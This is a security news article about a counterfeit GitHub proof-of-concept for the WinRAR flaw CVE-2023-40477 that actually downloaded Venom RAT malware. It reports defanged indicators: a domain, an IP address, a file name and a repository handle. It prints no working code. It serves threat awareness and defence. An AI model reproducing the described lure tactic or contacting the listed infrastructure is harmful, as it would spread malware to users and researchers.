A malicious actor executed a rather unconventional strategy by releasing a counterfeit proof-of-concept (PoC) exploit for a newly unveiled WinRAR vulnerability on the popular code-sharing platform GitHub.
The intent behind this peculiar maneuver was to compromise unsuspecting users who downloaded the deceptive code, introducing them to the Venom RAT malware.
Notably, this faux PoC leveraged a publicly available script, initially designed to exploit a SQL injection vulnerability found in a software application known as GeoServer, under the designation CVE-2023-25157.
Palo Alto’ Network’s Analysis
Palo Alto Networks Unit 42 researcher, Robert Falcone, shed light on this unorthodox approach, emphasizing the actor’s deceptive tactics.
While the phenomenon of fraudulent PoCs is not uncommon when it comes to targeting the research community, it is noteworthy that cybersecurity experts have detected a potentially opportunistic twist.
These threat actors seem to be eyeing fellow malicious actors who might be incorporating the latest vulnerabilities into their toolkit.
The GitHub repository, under the handle “whalersplonk,” which hosted this deceptive PoC, has since been rendered inaccessible. It is worth noting that the PoC was added to the repository on August 21, 2023, a mere four days after the vulnerability’s public disclosure.
The CVE-2023-40477 Vulnerability
The vulnerability in question, CVE-2023-40477, pertains to a validation flaw within the WinRAR utility, posing the risk of remote code execution (RCE) on Windows systems. It was promptly addressed by the maintainers in version WinRAR 6.23, alongside another actively-exploited flaw identified as CVE-2023-38831.
Further analysis of the repository uncovered a Python script and a Streamable video, both serving as instructional materials for utilizing the exploit. The video garnered 121 views in total.
Notably, rather than executing the PoC, the Python script initiates communication with a remote server located at “checkblacklistwords[.]eu,” fetching an executable file named “Windows.Gaming.Preview.exe,” identified as a variant of the Venom RAT.
This malicious payload equips threat actors with the ability to enumerate running processes and receive commands from a server under their control, residing at IP address 94.156.253[.]109.
An in-depth examination of the attack infrastructure revealed a noteworthy detail: the threat actor had registered the “checkblacklistwords[.]eu” domain at least ten days prior to the public disclosure of the vulnerability. This indicates a calculated move on the actor’s part, capitalizing swiftly on the newfound criticality of the security flaw to attract potential victims.